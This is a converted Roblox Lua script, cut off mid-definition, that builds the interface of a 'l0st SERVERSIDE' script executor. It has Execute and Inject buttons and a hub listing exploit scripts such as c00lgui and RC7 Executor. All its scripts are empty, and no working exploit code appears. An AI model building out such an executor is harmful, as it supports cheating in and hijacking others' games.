--[=[
 d888b  db    db d888888b      .d888b.      db      db    db  .d8b.  
88' Y8b 88    88   `88'        VP  `8D      88      88    88 d8' `8b 
88      88    88    88            odD'      88      88    88 88ooo88 
88  ooo 88    88    88          .88'        88      88    88 88~~~88 
88. ~8~ 88b  d88   .88.        j88.         88booo. 88b  d88 88   88    @uniquadev
 Y888P  ~Y8888P' Y888888P      888888D      Y88888P ~Y8888P' YP   YP  CONVERTER 
]=]

-- Instances: 101 | Scripts: 23 | Modules: 0 | Tags: 0
local G2L = {};

-- StarterGui.ScreenGui
G2L["1"] = Instance.new("ScreenGui", game:GetService("CoreGui"));
G2L["1"]["ZIndexBehavior"] = Enum.ZIndexBehavior.Sibling;


-- StarterGui.ScreenGui.LocalScript
G2L["2"] = Instance.new("LocalScript", G2L["1"]);



-- StarterGui.ScreenGui.LocalScript
G2L["3"] = Instance.new("LocalScript", G2L["1"]);



-- StarterGui.ScreenGui.Frame
G2L["4"] = Instance.new("Frame", G2L["1"]);
G2L["4"]["BorderSizePixel"] = 0;
G2L["4"]["BackgroundColor3"] = Color3.fromRGB(41, 41, 41);
G2L["4"]["Size"] = UDim2.new(0, 417, 0, 296);
G2L["4"]["Position"] = UDim2.new(0.2379, 0, 0.25628, 0);
G2L["4"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.Frame.LocalScript
G2L["5"] = Instance.new("LocalScript", G2L["4"]);



-- StarterGui.ScreenGui.Frame.Frame2
G2L["6"] = Instance.new("Frame", G2L["4"]);
G2L["6"]["BorderSizePixel"] = 0;
G2L["6"]["BackgroundColor3"] = Color3.fromRGB(41, 41, 41);
G2L["6"]["Size"] = UDim2.new(0, 417, 0, 50);
G2L["6"]["Position"] = UDim2.new(0, 0, -0.00338, 0);
G2L["6"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["6"]["Name"] = [[Frame2]];


-- StarterGui.ScreenGui.Frame.Frame2.TextLabel
G2L["7"] = Instance.new("TextLabel", G2L["6"]);
G2L["7"]["TextWrapped"] = true;
G2L["7"]["BorderSizePixel"] = 0;
G2L["7"]["TextSize"] = 14;
G2L["7"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["7"]["TextYAlignment"] = Enum.TextYAlignment.Top;
G2L["7"]["TextScaled"] = true;
G2L["7"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["7"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["7"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["7"]["BackgroundTransparency"] = 1;
G2L["7"]["Size"] = UDim2.new(0, 394, 0, 26);
G2L["7"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["7"]["Text"] = [[l0st SERVERSIDE]];
G2L["7"]["Position"] = UDim2.new(0.04317, 0, -0.02083, 0);


-- StarterGui.ScreenGui.Frame.Frame2.Frame
G2L["8"] = Instance.new("Frame", G2L["6"]);
G2L["8"]["BorderSizePixel"] = 0;
G2L["8"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["8"]["Size"] = UDim2.new(0, 430, 0, 11);
G2L["8"]["Position"] = UDim2.new(-0.01679, 0, -0.20833, 0);
G2L["8"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.Frame.Frame2.Frame
G2L["9"] = Instance.new("Frame", G2L["6"]);
G2L["9"]["BorderSizePixel"] = 0;
G2L["9"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["9"]["Size"] = UDim2.new(0, 408, 0, 6);
G2L["9"]["Position"] = UDim2.new(0.03357, 0, 0.54167, 0);
G2L["9"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.Frame.TextBox
G2L["a"] = Instance.new("TextBox", G2L["4"]);
G2L["a"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["a"]["PlaceholderColor3"] = Color3.fromRGB(255, 255, 255);
G2L["a"]["BorderSizePixel"] = 0;
G2L["a"]["TextWrapped"] = true;
G2L["a"]["TextSize"] = 14;
G2L["a"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["a"]["TextYAlignment"] = Enum.TextYAlignment.Top;
G2L["a"]["BackgroundColor3"] = Color3.fromRGB(59, 59, 59);
G2L["a"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["a"]["BorderMode"] = Enum.BorderMode.Middle;
G2L["a"]["PlaceholderText"] = [[-- by l0stk1dd88]];
G2L["a"]["Size"] = UDim2.new(0, 390, 0, 186);
G2L["a"]["Position"] = UDim2.new(0.05036, 0, 0.13288, 0);
G2L["a"]["BorderColor3"] = Color3.fromRGB(255, 255, 255);
G2L["a"]["Text"] = [[]];


-- StarterGui.ScreenGui.Frame.TextBox.LocalScript
G2L["b"] = Instance.new("LocalScript", G2L["a"]);



-- StarterGui.ScreenGui.Frame.TextBox.LocalScript
G2L["c"] = Instance.new("LocalScript", G2L["a"]);



-- StarterGui.ScreenGui.Frame.TextBox.Completor
G2L["d"] = Instance.new("LocalScript", G2L["a"]);
G2L["d"]["Name"] = [[Completor]];


-- StarterGui.ScreenGui.Frame.TextBox.UICorner
G2L["e"] = Instance.new("UICorner", G2L["a"]);



-- StarterGui.ScreenGui.Frame.TextBox.UIStroke
G2L["f"] = Instance.new("UIStroke", G2L["a"]);
G2L["f"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;
G2L["f"]["Thickness"] = 2;


-- StarterGui.ScreenGui.Frame.ScriptHubFrame
G2L["10"] = Instance.new("ScrollingFrame", G2L["4"]);
G2L["10"]["Active"] = true;
G2L["10"]["ScrollingDirection"] = Enum.ScrollingDirection.Y;
G2L["10"]["BorderSizePixel"] = 0;
G2L["10"]["CanvasSize"] = UDim2.new(0, 0, 0, 0);
G2L["10"]["BackgroundColor3"] = Color3.fromRGB(92, 92, 92);
G2L["10"]["Name"] = [[ScriptHubFrame]];
G2L["10"]["AutomaticCanvasSize"] = Enum.AutomaticSize.Y;
G2L["10"]["Size"] = UDim2.new(0, 98, 0, 309);
G2L["10"]["Position"] = UDim2.new(1.03118, 0, -0.01028, 0);
G2L["10"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["10"]["ScrollBarThickness"] = 3;


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.LocalScript
G2L["11"] = Instance.new("LocalScript", G2L["10"]);



-- StarterGui.ScreenGui.Frame.ScriptHubFrame.Stroke
G2L["12"] = Instance.new("LocalScript", G2L["10"]);
G2L["12"]["Name"] = [[Stroke]];


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.c00lgui
G2L["13"] = Instance.new("TextButton", G2L["10"]);
G2L["13"]["TextWrapped"] = true;
G2L["13"]["BorderSizePixel"] = 0;
G2L["13"]["TextSize"] = 14;
G2L["13"]["TextScaled"] = true;
G2L["13"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["13"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["13"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["13"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["13"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["13"]["Text"] = [[c00lgui]];
G2L["13"]["Name"] = [[c00lgui]];


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.polaria
G2L["14"] = Instance.new("TextButton", G2L["10"]);
G2L["14"]["TextWrapped"] = true;
G2L["14"]["BorderSizePixel"] = 0;
G2L["14"]["TextSize"] = 14;
G2L["14"]["TextScaled"] = true;
G2L["14"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["14"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["14"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["14"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["14"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["14"]["Text"] = [[Polaria]];
G2L["14"]["Name"] = [[polaria]];
G2L["14"]["Position"] = UDim2.new(0, 0, 0.11285, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.hdadmin
G2L["15"] = Instance.new("TextButton", G2L["10"]);
G2L["15"]["TextWrapped"] = true;
G2L["15"]["BorderSizePixel"] = 0;
G2L["15"]["TextSize"] = 14;
G2L["15"]["TextScaled"] = true;
G2L["15"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["15"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["15"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["15"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["15"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["15"]["Text"] = [[HD Admin]];
G2L["15"]["Name"] = [[hdadmin]];
G2L["15"]["Position"] = UDim2.new(0, 0, 0.22571, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.UIListLayout
G2L["16"] = Instance.new("UIListLayout", G2L["10"]);
G2L["16"]["Padding"] = UDim.new(0, 5);
G2L["16"]["SortOrder"] = Enum.SortOrder.LayoutOrder;


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.1xgui
G2L["17"] = Instance.new("TextButton", G2L["10"]);
G2L["17"]["TextWrapped"] = true;
G2L["17"]["BorderSizePixel"] = 0;
G2L["17"]["TextSize"] = 14;
G2L["17"]["TextScaled"] = true;
G2L["17"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["17"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["17"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["17"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["17"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["17"]["Text"] = [[1x1x1x1 GUI]];
G2L["17"]["Name"] = [[1xgui]];
G2L["17"]["Position"] = UDim2.new(0, 0, 0.45141, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.c00lkidd
G2L["18"] = Instance.new("TextButton", G2L["10"]);
G2L["18"]["TextWrapped"] = true;
G2L["18"]["BorderSizePixel"] = 0;
G2L["18"]["TextSize"] = 14;
G2L["18"]["TextScaled"] = true;
G2L["18"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["18"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["18"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["18"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["18"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["18"]["Text"] = [[Forsaken c00lkidd]];
G2L["18"]["Name"] = [[c00lkidd]];
G2L["18"]["Position"] = UDim2.new(0, 0, 2.59561, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.happyhub
G2L["19"] = Instance.new("TextButton", G2L["10"]);
G2L["19"]["TextWrapped"] = true;
G2L["19"]["BorderSizePixel"] = 0;
G2L["19"]["TextSize"] = 14;
G2L["19"]["TextScaled"] = true;
G2L["19"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["19"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["19"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["19"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["19"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["19"]["Text"] = [[Happy Hub]];
G2L["19"]["Name"] = [[happyhub]];
G2L["19"]["Position"] = UDim2.new(0, 0, 3.04702, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.fatgui
G2L["1a"] = Instance.new("TextButton", G2L["10"]);
G2L["1a"]["TextWrapped"] = true;
G2L["1a"]["BorderSizePixel"] = 0;
G2L["1a"]["TextSize"] = 14;
G2L["1a"]["TextScaled"] = true;
G2L["1a"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1a"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["1a"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1a"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["1a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1a"]["Text"] = [[TeamFat GUI]];
G2L["1a"]["Name"] = [[fatgui]];


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.rc7
G2L["1b"] = Instance.new("TextButton", G2L["10"]);
G2L["1b"]["TextWrapped"] = true;
G2L["1b"]["BorderSizePixel"] = 0;
G2L["1b"]["TextSize"] = 14;
G2L["1b"]["TextScaled"] = true;
G2L["1b"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1b"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["1b"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1b"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["1b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1b"]["Text"] = [[RC7 Executor]];
G2L["1b"]["Name"] = [[rc7]];
G2L["1b"]["Position"] = UDim2.new(0, 0, 2.59561, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.l0stgui
G2L["1c"] = Instance.new("TextButton", G2L["10"]);
G2L["1c"]["TextWrapped"] = true;
G2L["1c"]["BorderSizePixel"] = 0;
G2L["1c"]["TextSize"] = 14;
G2L["1c"]["TextScaled"] = true;
G2L["1c"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1c"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["1c"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1c"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["1c"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1c"]["Text"] = [[l0stGUI v6]];
G2L["1c"]["Name"] = [[l0stgui]];
G2L["1c"]["Position"] = UDim2.new(0, 0, 0.45141, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.UIStroke
G2L["1d"] = Instance.new("UIStroke", G2L["10"]);
G2L["1d"]["Thickness"] = 7;


-- StarterGui.ScreenGui.Frame.Execute
G2L["1e"] = Instance.new("ImageButton", G2L["4"]);
G2L["1e"]["BorderSizePixel"] = 0;
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["1e"]["BackgroundColor3"] = Color3.fromRGB(25, 25, 25);
G2L["1e"]["Image"] = [[rbxassetid://12099513379]];
G2L["1e"]["Size"] = UDim2.new(0, 50, 0, 50);
G2L["1e"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1e"]["Name"] = [[Execute]];
G2L["1e"]["Position"] = UDim2.new(0.05036, 0, 0.78378, 0);


-- StarterGui.ScreenGui.Frame.Execute.LocalScript
G2L["1f"] = Instance.new("LocalScript", G2L["1e"]);



-- StarterGui.ScreenGui.Frame.Execute.UICorner
G2L["20"] = Instance.new("UICorner", G2L["1e"]);



-- StarterGui.ScreenGui.Frame.Execute.UIStroke
G2L["21"] = Instance.new("UIStroke", G2L["1e"]);
G2L["21"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;
G2L["21"]["Thickness"] = 2;


-- StarterGui.ScreenGui.Frame.Clear
G2L["22"] = Instance.new("ImageButton", G2L["4"]);
G2L["22"]["BorderSizePixel"] = 0;
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["22"]["BackgroundColor3"] = Color3.fromRGB(25, 25, 25);
G2L["22"]["Image"] = [[rbxassetid://9348208337]];
G2L["22"]["Size"] = UDim2.new(0, 50, 0, 50);
G2L["22"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["22"]["Name"] = [[Clear]];
G2L["22"]["Position"] = UDim2.new(0.19664, 0, 0.78378, 0);


-- StarterGui.ScreenGui.Frame.Clear.LocalScript
G2L["23"] = Instance.new("LocalScript", G2L["22"]);



-- StarterGui.ScreenGui.Frame.Clear.UICorner
G2L["24"] = Instance.new("UICorner", G2L["22"]);



-- StarterGui.ScreenGui.Frame.Clear.UIStroke
G2L["25"] = Instance.new("UIStroke", G2L["22"]);
G2L["25"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;
G2L["25"]["Thickness"] = 2;


-- StarterGui.ScreenGui.Frame.Inject
G2L["26"] = Instance.new("ImageButton", G2L["4"]);
G2L["26"]["BorderSizePixel"] = 0;
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["26"]["BackgroundColor3"] = Color3.fromRGB(25, 25, 25);
G2L["26"]["Image"] = [[rbxassetid://136911114506878]];
G2L["26"]["Size"] = UDim2.new(0, 50, 0, 50);
G2L["26"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["26"]["Name"] = [[Inject]];
G2L["26"]["Position"] = UDim2.new(0.86811, 0, 0.78378, 0);


-- StarterGui.ScreenGui.Frame.Inject.LocalScript
G2L["27"] = Instance.new("LocalScript", G2L["26"]);



-- StarterGui.ScreenGui.Frame.Inject.LocalScript
G2L["28"] = Instance.new("LocalScript", G2L["26"]);



-- StarterGui.ScreenGui.Frame.Inject.LocalScript
G2L["29"] = Instance.new("LocalScript", G2L["26"]);



-- StarterGui.ScreenGui.Frame.Inject.LocalScript
G2L["2a"] = Instance.new("LocalScript", G2L["26"]);



-- StarterGui.ScreenGui.Frame.Inject.UICorner
G2L["2b"] = Instance.new("UICorner", G2L["26"]);



-- StarterGui.ScreenGui.Frame.Inject.UIStroke
G2L["2c"] = Instance.new("UIStroke", G2L["26"]);
G2L["2c"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;
G2L["2c"]["Thickness"] = 2;


-- StarterGui.ScreenGui.Frame.ImageButton
G2L["2d"] = Instance.new("ImageButton", G2L["4"]);
G2L["2d"]["BorderSizePixel"] = 0;
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["2d"]["BackgroundColor3"] = Color3.fromRGB(41, 41, 41);
G2L["2d"]["ZIndex"] = 2;
G2L["2d"]["Image"] = [[rbxassetid://5107183916]];
G2L["2d"]["Size"] = UDim2.new(0, 40, 0, 36);
G2L["2d"]["BorderColor3"] = Color3.fromRGB(27, 27, 27);
G2L["2d"]["Position"] = UDim2.new(-0.079, 0, 0.16873, 0);


-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
G2L["2e"] = Instance.new("LocalScript", G2L["2d"]);



-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
G2L["2f"] = Instance.new("LocalScript", G2L["2d"]);



-- StarterGui.ScreenGui.Frame.ImageButton.UICorner
G2L["30"] = Instance.new("UICorner", G2L["2d"]);



-- StarterGui.ScreenGui.Frame.ImageButton.UIStroke
G2L["31"] = Instance.new("UIStroke", G2L["2d"]);
G2L["31"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.Line
G2L["32"] = Instance.new("Frame", G2L["4"]);
G2L["32"]["BorderSizePixel"] = 0;
G2L["32"]["BackgroundColor3"] = Color3.fromRGB(41, 41, 41);
G2L["32"]["Size"] = UDim2.new(0, 417, 0, 13);
G2L["32"]["Position"] = UDim2.new(0, 0, 1, 0);
G2L["32"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["32"]["Name"] = [[Line]];


-- StarterGui.ScreenGui.Frame.Line
G2L["33"] = Instance.new("Frame", G2L["4"]);
G2L["33"]["BorderSizePixel"] = 0;
G2L["33"]["BackgroundColor3"] = Color3.fromRGB(41, 41, 41);
G2L["33"]["Size"] = UDim2.new(0, 33, 0, 310);
G2L["33"]["Position"] = UDim2.new(-0.07914, 0, -0.03378, 0);
G2L["33"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["33"]["Name"] = [[Line]];


-- StarterGui.ScreenGui.Frame.Line.Line
G2L["34"] = Instance.new("Frame", G2L["33"]);
G2L["34"]["BorderSizePixel"] = 0;
G2L["34"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["34"]["Size"] = UDim2.new(0, 61, 0, 10);
G2L["34"]["Position"] = UDim2.new(-0.24242, 0, 0, 0);
G2L["34"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["34"]["Name"] = [[Line]];


-- StarterGui.ScreenGui.Frame.Line.ImageLabel
G2L["35"] = Instance.new("ImageLabel", G2L["33"]);
G2L["35"]["ZIndex"] = 10;
G2L["35"]["BorderSizePixel"] = 0;
G2L["35"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["35"]["Image"] = [[rbxassetid://81013369562879]];
G2L["35"]["Size"] = UDim2.new(0, 45, 0, 41);
G2L["35"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["35"]["BackgroundTransparency"] = 1;
G2L["35"]["Position"] = UDim2.new(-0.09091, 0, 0.02903, 0);


-- StarterGui.ScreenGui.Frame.Line.Frame
G2L["36"] = Instance.new("Frame", G2L["33"]);
G2L["36"]["ZIndex"] = 1111111111;
G2L["36"]["BorderSizePixel"] = 0;
G2L["36"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["36"]["Size"] = UDim2.new(0, 47, 0, 10);
G2L["36"]["Position"] = UDim2.new(-0.13473, 0, 0.16237, 0);
G2L["36"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.Frame.Line.Frame
G2L["37"] = Instance.new("Frame", G2L["33"]);
G2L["37"]["ZIndex"] = 1111111111;
G2L["37"]["BorderSizePixel"] = 0;
G2L["37"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["37"]["Size"] = UDim2.new(0, 47, 0, 10);
G2L["37"]["Position"] = UDim2.new(-0.04382, 0, 0.29785, 0);
G2L["37"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.Frame.Line.Frame
G2L["38"] = Instance.new("Frame", G2L["33"]);
G2L["38"]["ZIndex"] = 1111111111;
G2L["38"]["BorderSizePixel"] = 0;
G2L["38"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["38"]["Size"] = UDim2.new(0, 47, 0, 10);
G2L["38"]["Position"] = UDim2.new(-0.10443, 0, 0.44624, 0);
G2L["38"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.Frame.Line.Frame
G2L["39"] = Instance.new("Frame", G2L["33"]);
G2L["39"]["ZIndex"] = 1111111111;
G2L["39"]["BorderSizePixel"] = 0;
G2L["39"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["39"]["Size"] = UDim2.new(0, 47, 0, 10);
G2L["39"]["Position"] = UDim2.new(-0.10443, 0, 0.5914, 0);
G2L["39"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.Frame.Line.Frame
G2L["3a"] = Instance.new("Frame", G2L["33"]);
G2L["3a"]["ZIndex"] = 1111111111;
G2L["3a"]["BorderSizePixel"] = 0;
G2L["3a"]["BackgroundColor3"] = Color3.fromRGB(27, 27, 27);
G2L["3a"]["Size"] = UDim2.new(0, 47, 0, 124);
G2L["3a"]["Position"] = UDim2.new(-0.10443, 0, 0.62366, 0);
G2L["3a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.Frame.Line.Frame.TextLabel
G2L["3b"] = Instance.new("TextLabel", G2L["3a"]);
G2L["3b"]["TextWrapped"] = true;
G2L["3b"]["BorderSizePixel"] = 0;
G2L["3b"]["TextSize"] = 14;
G2L["3b"]["TextScaled"] = true;
G2L["3b"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["3b"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["3b"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["3b"]["BackgroundTransparency"] = 1;
G2L["3b"]["Size"] = UDim2.new(0, 38, 0, 37);
G2L["3b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["3b"]["Text"] = [[3.5.2]];
G2L["3b"]["Position"] = UDim2.new(0.06383, 0, 0.39024, 0);


-- StarterGui.ScreenGui.Frame.Line.Frame.TextLabel.LocalScript
G2L["3c"] = Instance.new("LocalScript", G2L["3b"]);



-- StarterGui.ScreenGui.Frame.Line
G2L["3d"] = Instance.new("Frame", G2L["4"]);
G2L["3d"]["ZIndex"] = 3;
G2L["3d"]["BorderSizePixel"] = 0;
G2L["3d"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["3d"]["Size"] = UDim2.new(0, 7, 0, 319);
G2L["3d"]["Position"] = UDim2.new(0.01679, 0, -0.03378, 0);
G2L["3d"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["3d"]["Name"] = [[Line]];


-- StarterGui.ScreenGui.Frame.Line
G2L["3e"] = Instance.new("Frame", G2L["4"]);
G2L["3e"]["ZIndex"] = 3;
G2L["3e"]["BorderSizePixel"] = 0;
G2L["3e"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["3e"]["Size"] = UDim2.new(0, 8, 0, 319);
G2L["3e"]["Position"] = UDim2.new(-0.09832, 0, -0.03378, 0);
G2L["3e"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["3e"]["Name"] = [[Line]];


-- StarterGui.ScreenGui.Frame.Line
G2L["3f"] = Instance.new("Frame", G2L["4"]);
G2L["3f"]["ZIndex"] = 3;
G2L["3f"]["BorderSizePixel"] = 0;
G2L["3f"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["3f"]["Size"] = UDim2.new(0, 464, 0, 9);
G2L["3f"]["Position"] = UDim2.new(-0.09832, 0, 1.01351, 0);
G2L["3f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["3f"]["Name"] = [[Line]];


-- StarterGui.ScreenGui.Frame.Line
G2L["40"] = Instance.new("Frame", G2L["4"]);
G2L["40"]["ZIndex"] = 3;
G2L["40"]["BorderSizePixel"] = 0;
G2L["40"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["40"]["Size"] = UDim2.new(0, -6, 0, 319);
G2L["40"]["Position"] = UDim2.new(1.01439, 0, -0.03378, 0);
G2L["40"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["40"]["Name"] = [[Line]];


-- StarterGui.ScreenGui.Frame.Close
G2L["41"] = Instance.new("ImageButton", G2L["4"]);
G2L["41"]["BorderSizePixel"] = 0;
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["41"]["BackgroundColor3"] = Color3.fromRGB(41, 41, 41);
G2L["41"]["ZIndex"] = 2;
G2L["41"]["Image"] = [[rbxassetid://12935062141]];
G2L["41"]["Size"] = UDim2.new(0, 37, 0, 37);
G2L["41"]["BorderColor3"] = Color3.fromRGB(27, 27, 27);
G2L["41"]["Name"] = [[Close]];
G2L["41"]["Position"] = UDim2.new(-0.07914, 0, 0.46411, 0);


-- StarterGui.ScreenGui.Frame.Close.LocalScript
G2L["42"] = Instance.new("LocalScript", G2L["41"]);



-- StarterGui.ScreenGui.Frame.Close.LocalScript
G2L["43"] = Instance.new("LocalScript", G2L["41"]);



-- StarterGui.ScreenGui.Frame.Close.UIStroke
G2L["44"] = Instance.new("UIStroke", G2L["41"]);
G2L["44"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.Close.UICorner
G2L["45"] = Instance.new("UICorner", G2L["41"]);



-- StarterGui.ScreenGui.Frame.LabelFrame
G2L["46"] = Instance.new("Frame", G2L["4"]);
G2L["46"]["BorderSizePixel"] = 0;
G2L["46"]["BackgroundColor3"] = Color3.fromRGB(37, 37, 37);
G2L["46"]["Size"] = UDim2.new(0, 138, 0, 50);
G2L["46"]["Position"] = UDim2.new(0.35731, 0, 0.78378, 0);
G2L["46"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["46"]["Name"] = [[LabelFrame]];


-- StarterGui.ScreenGui.Frame.LabelFrame.RemoteLabel
G2L["47"] = Instance.new("TextLabel", G2L["46"]);
G2L["47"]["TextWrapped"] = true;
G2L["47"]["BorderSizePixel"] = 0;
G2L["47"]["TextSize"] = 14;
G2L["47"]["TextScaled"] = true;
G2L["47"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["47"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["47"]["TextColor3"] = Color3.fromRGB(207, 207, 207);
